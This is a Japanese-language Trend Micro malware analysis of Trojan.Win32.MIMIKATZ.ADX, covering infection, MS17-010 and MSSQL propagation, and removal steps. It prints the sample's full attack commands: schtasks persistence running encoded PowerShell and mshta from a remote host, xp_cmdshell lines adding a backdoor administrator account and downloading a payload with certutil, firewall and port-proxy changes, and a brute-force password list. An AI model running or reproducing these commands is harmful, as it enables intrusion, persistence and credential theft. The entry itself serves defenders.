Trend Micro Security

Trojan.Win32.MIMIKATZ.ADX

2019年2月28日
 解析者: John Anthony Banes   
 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化: はい
  • 感染報告の有無: はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。 マルウェアは、リモートサイトから他の不正プログラムにダウンロードされ、コンピュータに侵入します。

マルウェアは、ダウンロードしたファイルを実行します。

マルウェアは、特定の脆弱性を利用した感染活動を実行します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。

  詳細

ファイルサイズ 6,271,280 bytes
タイプ EXE
メモリ常駐 はい
発見日 2019年2月27日
ペイロード URLまたはIPアドレスに接続

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、リモートサイトから以下の不正プログラムによりダウンロードされ、コンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • {malware path}\mkatz.ini - Mimikatz script output
  • %User Temp%\_MEI{random}\{Python components}
  • {malware path}\oskjwyh28s3.exe - contains "*"

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)

マルウェアは、以下のファイルを作成し実行します。

マルウェアは、以下のプロセスを追加します。

  • netsh advfirewall set allprofile state on
  • netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445
  • netsh advfirewall firewall add rule name=denyy135 dir=in action=block protocol=TCP localport=135
  • netsh advfirewall firewall add rule name=denyy136 dir=in action=block protocol=TCP localport=136
  • netsh advfirewall firewall add rule name=denyy137 dir=in action=block protocol=TCP localport=137
  • netsh advfirewall firewall add rule name=denyy139 dir=in action=block protocol=TCP localport=139
  • netsh firewall add portopening tcp 65531 DNS
  • netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
  • netsh firewall add portopening tcp 65532 DNS2
  • netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=54

マルウェアは、以下のフォルダを作成します。

  • %User Temp%\_MEI{random}

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

  • http://{BLOCKED}l.{BLOCKED}o.net/dll.exe?fr={eb or mssql}

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

マルウェアは、ダウンロードしたファイルを実行します。

その他

マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。

  • http://{BLOCKED}.{BLOCKED}.pl/raw
  • http://{BLOCKED}p.com

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

<補足>
侵入方法

マルウェアは、リモートサイトから以下の不正プログラムによりダウンロードされ、コンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • {マルウェアのパス}\mkatz.ini - Mimikatzスクリプトの出力
  • %User Temp%\_MEI{ランダム}\{Python コンポーネント}
  • {マルウェアのパス}\oskjwyh28s3.exe - "*"が含まれる

マルウェアは、以下のファイルを作成し実行します。

  • {マルウェアのパス}\m.ps1 - 難読化されたMimikatzのPowerShellスクリプト。Trojan.PS1.MIMIKATZ.ADS として検出される

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

  • http://{BLOCKED}l.{BLOCKED}o.net/dll.exe?fr={eb または mssql}

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

その他

マルウェアは、以下を実行します。

  • 以下のWebサイトに接続してスクリプトをダウンロードして実行します。
    • http://v.{BLOCKED}h.com/v{ユーザドメイン}
    • http://w.{BLOCKED}h.com/page.html?p{コンピュータ名}
  • ポート60124は重複を避けるミューテックス(Mutex)として機能し、1つのインスタンスのみが実行されます。
  • ユーザ"k8h3d"が存在する場合はそれを削除します。その後、感染コンピュータおよび脆弱性が存在するターゲットのコンピュータに同じユーザ名を作成します。
  • インターネットとローカルネットワーク上に開放されているポート445を、無作為に生成したIPアドレスで検索します。
    開放されているポート445のターゲットを見つけると、MS17-010の脆弱性を利用し、以下のコマンドを実行します。
    • 以下のファイルのいずれかをターゲットに送信し、%System Root%\ installed.exe、および %System Root%\ installed2.exe として保存する
      • %Windows%\System32\svhost.exe
      • %Windows%\SysWOW64\svhost.exe
      • %Windows%\System32\drivers\svchost.exe
      • %Windows%\SysWOW64\drivers\svchost.exe
    • %Temp%\ svchost.exe を %Windows%\{ランダムな4~8文字}.exe としてコピーする
    • %Temp%\ dig.exe を %Windows%\ {ランダムな4〜8文字}.exe として移動する
    • 以下のff. コマンドが含まれる %Temp%\ p.bat という名前のバッチファイルを作成する
      • move /y %Temp%\{ランダムな4~8文字}.exe %Windows%
      • netsh interface ipv6 install
      • netsh firewall add portopening tcp 65532 DNS2
      • netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53
      • netsh firewall add portopening tcp 65531 DNSS2
      • netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
      • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base64文字列}" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{ランダムな4~8文字}" /tr "%Windows%\{ランダムな4~8文字}.exe" /F&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%Temp%\svchost.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "%Windows%\{ランダムな4~8文字}.exe"&schtasks /run /TN Autostart&schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "%Temp%\svchost.exe"&schtasks /run /TN Autoscan)
      • net start Ddriver
      • for /f %%i in (\'tasklist | find /c /i "cmd.exe"\') do set s=%%i
      • if %s% gtr 10 (shutdown /r)
      • net user k8h3d /del
      • %Temp%\svchost.exe
      • del %Temp%\p.bat
    • %Temp%\updll.exe および %Temp%\upinstalled.ex をターゲットコンピュータにコピーし、同じファイル名で保存します。その後、%Temp%\tmp.vbs を作成してコピーしたファイルを実行する
    • ターゲットマシン上で、送信したファイルの実行を試行する
  • 脆弱性の利用に失敗した場合、無作為に生成したIPアドレスでインターネットおよびローカルネットワーク上に開放されているポート1433を検索します。
    ポート1433が開放されているターゲットを見つけると、以下のSQLコマンドの実行を試みます。
    • exec sp_dropextendedproc 'xp_cmdshell';
    • dbcc addextendedproc('xp_cmdshell','xplog70.dll')
    • EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;
    • xp_cmdshell 'net user k8h3d k8d3j9SjfS7 /ADD && net localgroup administrators k8h3d /ADD&netsh advfirewall firewall add rule name=mssql dir=in action=allow protocol=TCP localport=1433&netsh advfirewall firewall add rule name=web dir=in action=allow protocol=TCP localport=80'
    • sp_password Null,'ksa8hd4,m@~#$%^&*()','sa';
    • xp_cmdshell \'cmd /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base64文字列}" /F&netsh firewall add portopening tcp 65533 DNSsql&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&certutil -urlcache -split -f http://dl.{BLOCKED}o.net/dll.exe?fr=mssql c:\setupinstalled.exe&&c:\setupinstalled.exe'')

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

マルウェアは、以下のスケジュールされたタスクを追加します。

  • タスク名:DnsScan
    実行するタスク:{マルウェアのパスおよびファイル名}
  • タスク名:\Microsoft\windows\Bluetooths
    実行するタスク:powershell -ep bypass -e {base64 文字列}
  • タスク名:Autocheck
    実行するタスク: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
  • タスク名:Autoscan
    実行するタスク:%Temp%\svchost.exe

注:
以下のユーザ名とパスワードを使用して、ターゲットコンピュータへのログインを試みます。

  • ユーザ名:
    • Administrator
    • user
    • admin
    • test
    • hp
    • guest
    • k8h3d
  • ユーザ名 (SQL):
    • sa
    • mssqla
    • usera
  • パスワード:
    • 123456
    • password
    • qwerty
    • 12345678
    • 123456789
    • 123
    • 1234
    • 123123
    • 12345
    • 12345678
    • 123123123
    • 1234567890
    • 88888888
    • 111111111
    • 0
    • 111111
    • 112233
    • 123321
    • 654321
    • 666666
    • 888888
    • a123456
    • 123456a
    • 5201314
    • 1qaz2wsx
    • 1q2w3e4r
    • qwe123
    • 123qwe
    • a123456789
    • 123456789a
    • baseball
    • dragon
    • football
    • iloveyou
    • password
    • sunshine
    • princess
    • welcome
    • abc123
    • monkey
    • !@#$%^&*
    • charlie
    • aa123456
    • Aa123456
    • admin
    • homelesspa
    • password1
    • 1q2w3e4r5t
    • qwertyuiop
    • 1qaz2wsx
    • sa
    • sasa
    • sa123
    • sql2005
    • 1
    • admin@123
    • sa2008
    • 1111
    • passw0rd
    • abc
    • abc123
    • abcdefg
    • sapassword
    • Aa12345678
    • ABCabc123
    • sqlpassword
    • 1qaz2wsx
    • 1qaz!QAZ
    • sql2008
    • ksa8hd4,m@~#$%^&*()
    • 4yqbm4,m`~!@~#$%^&*(),.;
    • A123456
    • k8d3j9SjfS7

ファイル %Temp%\mkatz.ini は、ドメイン、ユーザ名、およびパスワードを取得するために解析されます。これらは、ターゲットコンピュータへのログイン試行にも使用されます。

一部のコマンドが実行されるためには、情報作成時現在 HackTool.Win32.Radmin.GBとして検出されるコンポーネントが必要です。 このコンポーネントは、 ターゲットコンピュータの %Windows%ディレクトリ以下に、{ランダムな8文字}.exe として作成される可能性があります。

また、以下のレジストリキーとエントリをターゲットコンピュータに作成します。そして、上記のコンポーネントファイルとコマンドを実行します。

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\{ランダムな4文字} DisplayName = {ランダムな4文字} ImagePath = can be %Windows%\{ランダムな8文字}.exe、または {コマンド文字列}

コンポーネントファイルとサービスは、実行後に削除される可能性があります。

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 14.840.02
初回 VSAPI パターンリリース日 2019年2月27日
VSAPI OPR パターンバージョン 14.841.00
VSAPI OPR パターンリリース日 2019年2月28日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

「Trojan.Win32.MIMIKATZ.ADX」 が作成またはダウンロードした不正なファイルを削除します。(註:以下のマルウェアもしくはアドウェア等がすでに削除されている場合は、本手順は行う必要はありません。)

     
    • Trojan.Win32.INFOSTEAL.ADS

手順 4

Windowsをセーフモードで再起動します。

[ 詳細 ]

手順 5

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • {malware path}\oskjwyh28s3.exe
  • {malware path}\mkatz.ini
  • {malware path}\m.ps1
  • %Windows%\SysWOW64\svhost.exe
  • %Windows%\SysWOW64\drivers\svchost.exe
  • %Windows%\System32\svhost.exe
  • %Windows%\System32\drivers\svchost.exe
  • %Windows%\{random 4-8 letters}.exe
  • %Temp%\upinstalled.exe
  • %Temp%\updll.exe
  • %Temp%\tmp.vbs
  • %Temp%\p.bat
  • %Temp%\dig.exe
  • %Temp%\{Random 4-8 letters}.exe
  • %System Root%\setupinstalled.exe
  • %System Root%\install.exe

手順 6

以下のフォルダを検索し削除します。

[ 詳細 ]
フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %User Temp%\_MEI{random}

手順 7

スケジュールされたタスクを削除する

タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

  • Task Name: DnsScan
  • Task to be Run: {malware path and filename}
  • Task Name: \Microsoft\windows\Bluetooths
  • Task to be Run: powershell -ep bypass -e {base-64 string}
  • Task Name: Autocheck
  • Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
  • Task Name: Autoscan
  • Task to be Run: %Temp%\svchost.exe

Windows 2000、Windows XP、Windows Server 2003の場合:

  1. [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
  2. 上記の{タスク名} を、[名前]の欄に入力します。
  3. 入力した{タスク名} 持つファイルを右クリックします。
  4. [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
  5. 上記の{実行するタスク}と文字列が一致するタスクを削除します。

Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:

  1. Windowsタスクスケジューラを開きます。
    • Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
    • Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
  2. 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
  3. 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
  4. 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
  5. 文字列が一致するタスクを削除します。

手順 8

コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win32.MIMIKATZ.ADX」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 9

以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。  Microsoft Security Bulletin MS17-010


ご利用はいかがでしたか? アンケートにご協力ください